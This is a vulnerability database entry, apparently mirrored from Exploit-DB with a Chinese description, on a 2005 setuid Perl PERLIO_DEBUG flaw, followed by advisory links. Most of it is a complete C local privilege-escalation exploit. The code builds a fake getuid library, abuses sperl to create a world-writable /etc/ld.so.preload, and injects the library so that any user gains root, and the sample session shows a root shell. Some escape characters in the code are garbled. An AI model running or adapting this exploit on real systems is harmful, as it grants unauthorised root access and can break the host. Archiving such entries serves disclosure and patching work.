https://www.exploit-db.com/exploits/792
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-522

部分Perl脚本在处理PERLIO_DEBUG变量时存在问题，本地攻击者可以利用这个漏洞破坏系统文件或进行缓冲区溢出攻击。

/*
 * Copyright Kevin Finisterre 
 * 
 * ** DISCLAIMER ** I am in no way responsible for your stupidity.
 * ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and or execution of this code.
 *
 * ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
 * ** WARNING ** overwriting /etc/ld.so.preload can severly fuck up your box (or someone elses).
 * ** WARNING ** have a boot disk ready incase some thing goes wrong.
 *
 * Setuid Perl exploit by KF - kf_lists[at]secnetops[dot]com - 1/30/05
 *
 * this exploits a vulnerability in the PERLIO_DEBUG functionality
 * tested against sperl5.8.4 on Debian
 *
 * kfinisterre@jdam:~$ cc -o ex_perl ex_perl.c
 * kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
 * ls: /etc/ld.so.preload: No such file or directory
 * kfinisterre@jdam:~$ ./ex_perl
 * sperl needs fd script
 * You should not call sperl directly; do you need to change a #! line
 * from sperl to perl?
 * kfinisterre@jdam:~$ su -
 * jdam:~# id
 * uid=0(root) gid=0(root) groups=0(root)
 * jdam:~# rm /etc/ld.so.preload
 *
 */


#define PRELOAD "/etc/ld.so.preload"
#include <stdio.h>
#include <strings.h>

int main(int *argc, char **argv)
{

        FILE *getuid;
        if(!(getuid = fopen("/tmp/getuid.c","w+"))) {
                printf("error opening filen");
                exit(1);
        }
        
	fprintf(getuid, "int getuid(){return 0;}n" );
        fclose(getuid);

        system("cc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc");

	putenv("PERLIO_DEBUG="PRELOAD);
        umask(001); // I'm rw-rw-rw james bitch!
        system("/usr/bin/sperl5.8.4");
        FILE *ld_so_preload;

        char preload[] = {
                "/tmp/getuid.son"
        };

        if(!(ld_so_preload = fopen(PRELOAD,"w+"))) {
                printf("error opening filen");
                exit(1);
        }
        fwrite(preload,sizeof(preload)-1,1,ld_so_preload);
        fclose(ld_so_preload);
}

// milw0rm.com [2005-02-07]

来源:XF
名称:perl-perliodebug-file-overwrite(19207)
链接:http://xforce.iss.net/xforce/xfdb/19207
来源:TRUSTIX
名称:2005-0003
链接:http://www.trustix.org/errata/2005/0003/
来源:BID
名称:12426
链接:http://www.securityfocus.com/bid/12426
来源:REDHAT
名称:RHSA-2005:105
链接:http://www.redhat.com/support/errata/RHSA-2005-105.html
来源:REDHAT
名称:RHSA-2005:103
链接:http://www.redhat.com/support/errata/RHSA-2005-103.html
来源:GENTOO
名称:GLSA-200502-13
链接:http://www.gentoo.org/security/en/glsa/glsa-200502-13.xml
来源:FULLDISC
名称:20050207DMA[2005-0131a]-‘SetuidPerlPERLIO_DEBUGrootownedfilecreation’
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m;=110779723332339&w;=2
来源:BUGTRAQ
名称:20050202[USN-72-1]Perlvulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110737149402683&w;=2
来源:MISC
名称:http://www.digitalmunition.com/DMA[2005-0131a].txt
链接:http://www.digitalmunition.com/DMA%5B2005-0131a%5D.txt
来源:MANDRAKE
名称:MDKSA-2005:031
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2005:031
来源:support.avaya.com
链接:http: